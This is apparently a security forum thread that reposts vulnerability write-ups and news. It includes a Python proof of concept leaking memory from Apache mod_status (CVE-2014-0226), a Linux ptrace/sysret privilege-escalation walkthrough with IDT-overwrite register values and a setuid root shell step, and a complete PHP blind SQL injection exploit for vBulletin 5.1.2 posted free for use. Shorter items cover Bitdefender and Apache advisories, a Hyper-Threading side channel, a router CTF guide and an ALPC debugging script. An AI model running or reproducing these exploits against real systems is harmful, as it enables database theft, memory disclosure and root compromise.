copies string 's' to the escaped 'd' string BUT apr_palloc has allocated only one byte for 's'. Thus, for each i > 0 the loop reads random memory and copies that value to 'd' string. At this point it's possible to trigger an information leak vulnerability (see section 5). However the 's' string may overlap with 'd' i.e.: 's' is allocated under 0 with contents s = "AAAAAAAA>" 'd' is allocated under 8 then s[8] = d[0]. If that would be the case, then for-loop would run forever (s[i] never would be since it was overwritten in the loop by non-zero). Forever... until it hits an unmapped memory or read only area. Part of the scoreboard.c code which may overwrite the ws_record->request was discovered using a tsan: #1 ap_escape_logitem ??:0 (exe+0x0000000411f2) #2 status_handler /home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 (mod_status.so+0x0000000044b0) #3 ap_run_handler ??:0 (exe+0x000000084d98) #4 ap_invoke_handler ??:0 (exe+0x00000008606e) #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) #6 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b143e) #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #8 ap_run_process_connection ??:0 (exe+0x00000009d156) #9 process_socket event.c:0 (exe+0x0000000cc65e) #10 worker_thread event.c:0 (exe+0x0000000d0945) #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #12 :0 (libtsan.so.0+0x00000001b279) Previous write of size 1 at 0x7feff2b862b8 by thread T2: #0 update_child_status_internal scoreboard.c:0 (exe+0x00000004d4c6) #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) #2 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b139a) #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #4 ap_run_process_connection ??:0 (exe+0x00000009d156) #5 process_socket event.c:0 (exe+0x0000000cc65e) #6 worker_thread event.c:0 (exe+0x0000000d0945) #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #8 :0 (libtsan.so.0+0x00000001b279) --[ 3. Consequences Race condition described in section 2, may lead to: - information leak in case when the string returned by ap_escape_logitem is not at the end, junk after copied bytes may be valuable - overwriting heap with a user supplied value which may imply code execution --[ 4. Exploitation In order to exploit the heap overflow bug it's necessary to get control over: 1) triggering the race-condition bug 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap 3) part of 's' which doesn't overlap with 'd' (this string is copied over and over again) 4) overwriting the heap in order to get total control over the cpu or at least modify the apache's handler code flow for our benefits --[ 5. Information Disclosure Proof of Concept -- cut #! /usr/bin/env python import httplib import sys import threading import subprocess import random def send_request(method, url): try: c = httplib.HTTPConnection('127.0.0.1', 80) c.request(method,url); if "foo" in url: print c.getresponse().read() c.close() except Exception, e: print e pass def mod_status_thread(): while True: send_request("GET", "/foo?notables") def requests(): evil = ''.join('A' for i in range(random.randint(0, 1024))) while True: send_request(evil, evil) threading.Thread(target=mod_status_thread).start() threading.Thread(target=requests).start() -- cut Below are the information leak samples gathered by running the poc against the testing Apache instance. Leaks include i.e. HTTP headers, htaccess content, httpd.conf content etc. On a live systems with a higher traffic samples should be way more interesting. $ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables 127.0.0.1 {A} [] 127.0.0.1 {A.01 cu0 cs0 127.0.0.1 {A27.0.0.1} [] 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 127.0.0.1 {A Û [] 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ab><br /> 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br /> 127.0.0.1 {A0.1.1:19666]</b><br /> 127.0.0.1 {A§} [] 127.0.0.1 {A cs0 127.0.0.1 {Adentity 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ape: text/html; charset=ISO-8859-1 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} [] 127.0.0.1 {Aÿÿÿÿÿÿÿ} [] 127.0.0.1 {Aanilla/htdocs/foo} [] 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} [] 127.0.0.1 {A......................................... } [] 127.0.0.1 {A-2014 16:23:30 CEST} [] 127.0.0.1 {Acontent of htaccess 127.0.0.1 {Aver: Apache/2.4.7 (Unix) 127.0.0.1 {Aroxy:balancer://mycluster} [] We hope you enjoyed it. Regards, Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 P.S. Re http://1337day.com/exploits/22451 , srsly? Either fake and someone tries to impersonate http://people.apache.org/~jorton/ or shame on you mate. Attachment: cve-2014-0226.txt Sursa: Full Disclosure: Apache HTTPd - description of the CVE-2014-0226.
  12. Nytro
    CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis by Vitaly Nikolenko Posted on July 21, 2014 at 6:52 PM Introduction I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or reflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered. First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, the SYSRET does the following: Load the instruction pointer (%rip) from %rcx Change code segment selector to guest mode (this effectively changes the privilege level) and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes to play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link). On AMD architectures, the %rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, thethe #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore the %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the %rsp value from the user-space %rsp. In summary, this means that if we can trigger #GP in SYSRET: #GP will execute in privileged mode #GP will use the stack pointer supplied by us from user-space That's great but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instaed of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path. Exploitation For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches. To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using0x8fffffffffffffff but any non-canonical address would work. The next step is to set the %rsp value. If we'll set it a user-space address, we'll simply double fault. However, if we'll set it writable address in kernel-space, we can overwrite data on the stack. Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer: 0xffffffff8165cba0 <general_protection> data32 xchg %ax,%ax 0xffffffff8165cba3 <general_protection+3> data32 xchg %ax,%ax 0xffffffff8165cba6 <general_protection+6> sub $0x78,%rsp 0xffffffff8165cbaa <general_protection+10> callq 0xffffffff8165cd90 <error_entry> [1] 0xffffffff8165cbaf <general_protection+15> mov %rsp,%rdi 0xffffffff8165cbb2 <general_protection+18> mov 0x78(%rsp),%rsi 0xffffffff8165cbb7 <general_protection+23> movq $0xffffffffffffffff,0x78(%rsp) 0xffffffff8165cbc0 <general_protection+32> callq 0xffffffff8165d040 <do_general_prote [2] 0xffffffff8165cbc5 <general_protection+37> jmpq 0xffffffff8165ce30 <error_exit> 0xffffffff8165cbca nopw 0x0(%rax,%rax,1) ... When entering the error_entry at [1], we overwrite a few entries on the stack ((0x78)%rsp to 0x8(%rsp)): 0xffffffff8165cd90 <error_entry> cld 0xffffffff8165cd91 <error_entry+1> mov %rdi,0x78(%rsp) 0xffffffff8165cd96 <error_entry+6> mov %rsi,0x70(%rsp) 0xffffffff8165cd9b <error_entry+11> mov %rdx,0x68(%rsp) 0xffffffff8165cda0 <error_entry+16> mov %rcx,0x60(%rsp) 0xffffffff8165cda5 <error_entry+21> mov %rax,0x58(%rsp) 0xffffffff8165cdaa <error_entry+26> mov %r8,0x50(%rsp) 0xffffffff8165cdaf <error_entry+31> mov %r9,0x48(%rsp) 0xffffffff8165cdb4 <error_entry+36> mov %r10,0x40(%rsp) 0xffffffff8165cdb9 <error_entry+41> mov %r11,0x38(%rsp) 0xffffffff8165cdbe <error_entry+46> mov %rbx,0x30(%rsp) 0xffffffff8165cdc3 <error_entry+51> mov %rbp,0x28(%rsp) 0xffffffff8165cdc8 <error_entry+56> mov %r12,0x20(%rsp) 0xffffffff8165cdcd <error_entry+61> mov %r13,0x18(%rsp) 0xffffffff8165cdd2 <error_entry+66> mov %r14,0x10(%rsp) 0xffffffff8165cdd7 <error_entry+71> mov %r15,0x8(%rsp) ... However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details): // get current registers ptrace(PTRACE_GETREGS, chld, NULL, ®s); // modify regs ... // set regs ptrace(PTRACE_SETREGS, chld, NULL, ®s); The general_protection handler then invokes the do_general_protection function at [2]: Dump of assembler code for function do_general_protection: 0xffffffff8165d040 <+0>: push %rbp 0xffffffff8165d041 <+1>: mov <code>%rsp</code>,%rbp 0xffffffff8165d044 <+4>: sub $0x20,<code>%rsp</code> 0xffffffff8165d048 <+8>: mov %rbx,-0x18(%rbp) 0xffffffff8165d04c <+12>: mov %r12,-0x10(%rbp) 0xffffffff8165d050 <+16>: mov %r13,-0x8(%rbp) 0xffffffff8165d054 <+20>: callq 0xffffffff816647c0 <mcount> 0xffffffff8165d059 <+25>: testb $0x2,0x91(%rdi) 0xffffffff8165d060 <+32>: mov %rdi,%r12 0xffffffff8165d063 <+35>: mov %rsi,%r13 0xffffffff8165d066 <+38>: je 0xffffffff8165d06f <do_general_protection+47> 0xffffffff8165d068 <+40>: callq *0xffffffff81c177d8 0xffffffff8165d06f <+47>: mov %gs:0xc500,%rbx [3] 0xffffffff8165d078 <+56>: testb $0x3,0x88(%r12) 0xffffffff8165d081 <+65>: je 0xffffffff8165d140 <do_general_protection+256> ... At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is what can we do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space: trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0); We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure. In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite the offset 32..63 in the #PF entry leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0 which is why we've mapped our user-space memory region at 0x800000000-0x900000000. I should point out that it's important to MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., #PF with trigger a double fault in this case. Here's the excerpt from the mmap(2) man page: MAP_POPULATE (since Linux 2.5.46) Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23. Once the #PF will is triggered, we'll land to our NOP sled. However, by that time, the IDT will trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, rdx, etc) to the original values: regs.rdi = 0x0000000000000000; regs.rsi = 0x81658e000010cbd0; regs.rdx = 0x00000000ffffffff; regs.rcx = 0x81658e000010cba0; regs.rax = 0x00000000ffffffff; regs.r8 = 0x81658e010010cb00; regs.r9 = 0x00000000ffffffff; regs.r10 = 0x81668e0000106b10; regs.r11 = 0x00000000ffffffff; regs.rbx = 0x81668e0000106ac0; regs.rbp = 0x00000000ffffffff; regs.r12 = 0x81668e0000106ac0; regs.r13 = 0x00000000ffffffff; regs.r14 = 0x81668e0200106a90; regs.r15 = 0x00000000ffffffff; This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine (commit_creds(prepare_kernel_cred(NULL))), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice. Conclusion There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects the kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. What other kernel structs can we overwrite that would give us a more reliable (and possible universal) way of exploitation? I would really appreciate any ideas here. Vitaly Nikolenko Twitter LinkedIn Email Copyright © Hashcrack 2014Sursa: Hashcrack - Vitaly Nikolenko
  13. Nytro
    Nota: danyweb a reusit sa il descopere inaintea tiganilor de la 1337gay. Si nu l-a facut public, nu a incercat sa il vanda... Edit: Am adaugat detalii.
  14. Nytro
    Nop, sa se faca de ras. Dupa cum se vede, e BANAL exploit-ul. Si nu e util, sunt prea putine forumuri cu vBulletin 5. O sa aduc mai multe detalii cand ajung la Bucuresti.
  15. Nytro
    Some idiots are trying to sell it: http://1337day.com/exploits/22452 For 2000 $. Gay Here it is. Free. [phpcode]<?php /* Author: Nytro Powered by: Romanian Security Team Price: Free. Educational. */ error_reporting(E_ALL); ini_set('display_errors', 1); // Get arguments $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; $expression = str_replace('/', '\\/', $target_url); // Function to send a POST request function httpPost($url,$params) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest', 'Referer: https://rstforums.com/v5/memberlist', 'Accept-Language: en-US,en;q=0.5', 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' )); $output = curl_exec($ch); if($output == FALSE) print htmlspecialchars(curl_error($ch)); curl_close($ch); return $output; } // Function to get string between two other strings function get_string_between($string, $start, $end) { $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } // Get version print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; print "Version: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get user print "\r\nUser: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get database print "\r\nDatabse: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } print "\r\n" ?>[/phpcode] More details: The query was the following: SELECT user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options, user.posts, user.joindate, user.usertitle,user.reputation, session.lastactivity AS lastvisit, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid FROM user AS user LEFT JOIN session AS session ON session.userid = user.userid WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%" GROUP BY user.userid ORDER BY user.username ASC LIMIT 0, 10; The "D" is the controlled parameter. And, the quote (") was NOT escaped. The query was generated with a function from querydefs.php: public function fetchMemberList($params, $db, $check_only = false)The vulnerable code: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $params['startswith'] . '%"'; } } And the patch contains the fix: if (!empty($params['startswith'])) { if ($params['startswith'] == '#') { $where[] = 'user.username REGEXP "^[^a-z].?"'; } else { $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"'; } } So now, the value is escaped and SQL Injection is fixed. vBulletin team moved really fast in fixing this problem. More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst
  16. Nytro
    https://code.google.com/p/torchat/
  17. Nytro
    Sa te vad ca faci 10 reviewuri. Pana atunci, nici nu punem problema pentru a astfel de categorie, mai ales ca nu are legatura cu securitatea IT. Sunt ironic, nu incerca sa scrii pentru ca nu ai ce sa scrii la un "review de program". Si nu ajuta pe nimeni.
  18. Nytro
    Cumpara niste pliculete. O sa vezi ca unele sunt chimicale pentru plante. E posibil sa apara ingredientele acolo.
  19. Nytro
    Ca sa inteleaga toata lumea: nu facem categorii noi daca nu exista deja minim 100 de topicuri care s-ar incadra in acea categorie.
  20. Nytro
    Nu am vazut NICIUN review pe aici. Deci nu.
  21. Nytro
    Flaws found in Bitdefender enterprise endpoint manager Hardcoded GravityZone creds to be wiped at month's end By Darren Pauli, 17 Jul 2014 Holes have been reported in Bitdefender's Gravity end-point protection platform that allow hackers to target corporate infrastructure. Researcher Stefan Viehbock of SEC Consult Vulnerability Lab said the flaw affecting the latest version provided an entry point for attackers to move laterally through the network. "Attackers are able to completely compromise the Bitdefender GravityZone solution as they can gain system and database level access," Viehbock said in an advisory. "Furthermore attackers can manage all endpoints." Gravity contained three vulnerabilities, two of which were patched including an unauthenticated local file disclosure in the platforms' web console and update server that allowed attackers to read arbitrary files - including cleartext passwords - "from the filesystem with the privileges of the nginx operating system user." Bitdefender also patched missing authentication for particular scripts in the web user interface that granted attackers access to admin functions. A remaining flaw meant the MongoDB database could be accessed and configuration data altered using hardcoded username and password credentials that users could not change. The security vendor planned to patch the remaining flaw at the end of the month. Security researchers recommended customers stop using the platform until a patch was released and a "thorough security review" was performed by security pros.® Sursa: Flaws found in Bitdefender enterprise endpoint manager • The Register
  22. Nytro
    Hyper-Threading Considered Harmful Hyper-Threading, as currently implemented on Intel Pentium Extreme Edition, Pentium 4, Mobile Pentium 4, and Xeon processors, suffers from a serious security flaw. This flaw permits local information disclosure, including allowing an unprivileged user to steal an RSA private key being used on the same machine. Administrators of multi-user systems are strongly advised to take action to disable Hyper-Threading immediately; single-user systems (i.e., desktop computers) are not affected. I presented details of how to exploit this security flaw at BSDCan 2005 in Ottawa on May 13th, 2005. For those who were unable to attend my talk, I have written a 12-page paper, Cache Missing for Fun and Profit, discussing this flaw and related problems, both realized and theoretical. Vendor statements The following statements have either been provided to me by vendors or quoted from vendor advisories: CVE: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-0109 to the problem of information disclosure resulting from cache evictions in simultaneous multithreading processors. This is a candidate for inclusion in the CVE list, which standardizes names for security problems. FreeBSD: This issue affects FreeBSD/i386 and FreeBSD/amd64, and is addressed in advisory FreeBSD-SA-05:09.htt. NetBSD: The NetBSD Security-Officer Team believes that workarounds will be suitable for the majority of our users. Since this issue is a complex one, the 'right' solution will require a larger discussion which is only possible once this issue is public. This issue will be addressed in advisory NetBSD-SA2005-001, which will provide a list of workarounds for use until the 'final' conclusion is reached. OpenBSD: OpenBSD does not directly support hyperthreading at this time, therefore no patch is available. Affected users may disable hyperthreading in their system BIOS. We will revisit this issue when hyperthreading support is improved. RedHat: Updated OpenSSL packages that fix security issues are now available [...] The OpenSSL library has been patched to add a new fixed-window mod_exp implementation as default for RSA, DSA, and DH private-key operations. This patch is designed to mitigate cache timing and potentially related attacks.
  23. Nytro
    Five Vulnerabilities Fixed in Apache Web Server by Dennis Fisher There are five vulnerabilities fixed in the latest release of the Apache Web server, including a buffer overflow and several denial-of-service vulnerabilities. Fixes for these flaws have landed in the developer release of the server, 2.4.10-dev. The buffer overflow vulnerability is rated moderate by the Apache Software Foundation, but it could be used for remote code execution under the right circumstances. The flaw lies in the way that Apache handles updating the mod_status component. It’s caused by a race condition, and an attacker can exploit it without authentication. “The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution,” says the advisory from HP’s Zero Day Initiative, which reported the vulnerability to Apache on behalf of the researcher who discovered it, Marek Kroemeke. Apache’s advisory says that an attacker would need the right conditions in order to exploit this vulnerability. “An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page,” Apache’s advisory says. Along with the buffer overflow, there are four DoS vulnerabilities fixed in 2.4.10. Two of those vulnerabilities are rated important and the other two are considered moderate risks. Sursa: Five Vulnerabilities Fixed in Apache Web Server | Threatpost | The first stop for security news
  24. Nytro
    [h=3]Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF[/h]So it's finally July, time to pack for DEFCON, follow @defconparties on Twitter and decide which villages to visit and which talks to attend. There's a new hacking competition this year called SOHOpelesslyBroken, presented by ISE and EFF. The objective on Track 0 is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. Track 1 will hold a live CTF for the duration of DEFCON. CTFs are always fun and this contest involves hacking real embedded devices, what makes it even more fun. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Yes, that's my workstation =P[/TD] [/TR] [/TABLE] I'm particularly interested on the EFF Open Wireless Router, but they didn't disclose details about the device yet. According to the event rules, the ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this competition CTF. recon The first thing to do is to find the firmware and its source code. Hopefully, Asus RT-AC66U is GPL'ed and we can easily find its source online. The version used for the contest is an old one, from 2012. In order to perform a better analysis, we are going to grab the sources and the firmware from v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing). Asus RT-AC66u v3.0.0.4.266 - Firmware Asus RT-AC66u v3.0.0.4.266 - Source Code Asus RT-AC66u v3.0.0.4.376.1123 - Firmware Asus RT-AC66u v3.0.0.4.376.1123 - Source Code Many firmware versions were published between these two releases, we can review the changelogs to find security issues: http://www.asus.com/Networking/RTAC66U/HelpDesk_Download According to the rules, we have to identify and exploit a 0-day vulnerability. We can combine different flaws with known issues in order to score points. If the vendor had silently patched an issue and you create an exploit for it, that should be scored as a valid 0-day (I'm not going to start discussing terminologies here). Now that we have the source code, it's time to extract and audit it: The CTF Field Guide from Trail of Bits has some good resources on Auditing Source Code. You can use tools like Beyond Compare, Araxis Merge and WinMerge on Windows platforms or Meld if you're more of a Linux user. Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld: There are many security advisories for this router: if you want to find 0-days you should look for disclosed vulnerabilities and exploits to avoid duplicates (believe me, this is the hardest part). Some references: ASUS RT-AC66U Remote Root (Broadcom ACSD) ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln Asus RT56U Remote Command Injection Taking over the ASUS RT-N56U and RT-AC66U Dear Asus router user: You’ve been pwned, thanks to easily exploited flaw (Asusgate) OSVDB Points are deducted from your score if your exploits requires special system configurations and specific information. If you want to score lots of points, you should be targeting default services and processes. The USB application tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba: MiniDLNA is also a nice a target. It should be pretty easy to find vulns for the service using Zachary Cutlip's research, as he broke it multiple times. Another potentially vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you access it through a mobile application: Articol complet: w00tsec: Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTF
  25. Nytro
    [h=2]ALPC monitoring[/h] Posted by zer0mem on July 15, 2014 Microsoft did nice work related to callback mechanism, to avoid nasty patching across kernel, and support monitoring in clean way. Currently we can use, among others, for example callbacks on loading new image, process, thread, opening & duplicating handles, dropping files etc. For monitoring network communication you can attach to some device drivers, which is cleaner than hooking, but still does not cover as much as i want to. And there comes ALPC, because even resolving host comes through, and when you are able to recognize it .. http://mba.shengwushibie.com/itbook/BookChapter.asp?id=28217 In april I attend awesome training at Syscan, training was led by Alex Ionescu. Among a lot of deep kernel stuffs, there was deeply covered ALPC mechanism, which is the point of this blog – post. Nice presentation about ALPC, which I really recommend to read : All about the RPC, LRPC, ALPC, and LPC in your PC starting with little windbg script : r? @$t6 = (nt!_LIST_ENTRY*)@@(nt!PsActiveProcessHead) .for (r? @$t7 = @$t6->Flink; (@$t6 != @$t7); r? @$t7 = @$t7->Flink) { r? @$t8 = #CONTAINING_RECORD(@$t7, nt!_EPROCESS, ActiveProcessLinks) r? @$t0 = (nt!_LIST_ENTRY*)@@(nt!AlpcpPortList) .for (r? @$t1 = @$t0->Flink; (@$t0 != @$t1); r? @$t1 = @$t1->Flink) { r? @$t2 = #CONTAINING_RECORD(@$t1, nt!_ALPC_PORT, PortListEntry) .if (@@(@$t8) == @@(@$t2->OwnerProcess)) { .if @@(@$t2->CommunicationInfo->ConnectionPort) { .printf /D "<link cmd=\"!alpc /p @$t2\">Server Port Info</link> <-> "; .printf /D "<link cmd=\"!alpc /p @@(@$t2->CommunicationInfo->ConnectionPort)\">Connection Port Info</link> | "; .printf "%10ma (%0.4x) <- ", @@(@$t2->OwnerProcess->ImageFileName), @@(@$t2->OwnerProcess->UniqueProcessId) .printf "%10ma (%0.4x)\n", @@(@$t2->CommunicationInfo->ConnectionPort->OwnerProcess->ImageFileName), @@(@$t2->CommunicationInfo->ConnectionPort->OwnerProcess->UniqueProcessId) .break } } } } .. that shows one interesting thing about ALPC, which I like at most : Server Port Info <-> Connection Port Info | svchost.exe (03f4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (0138) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (03f0) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | atieclxx.exe (048c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | svchost.exe (04e0) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | spoolsv.exe (058c) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (05a8) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | armsvc.exe (0610) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (062c) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | logonsetsvc.ex (0664) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | sqlwriter.exe (06d8) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (06ec) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | ThinkPadKBSvc. (0710) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | WLIDSVC.EXE (0738) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | logonset.exe (04a4) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | WLIDSVCM.EXE (05f4) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | svchost.exe (0870) <- csrss.exe (0170) Server Port Info <-> Connection Port Info | taskhost.exe (092c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | dwm.exe (098c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | explorer.exe (099c) <- csrss.exe (01c8) Server Port Info <-> Connection Port Info | MainCpl.exe (0aa4) <- csrss.exe (01c8) Server Port Info <-> 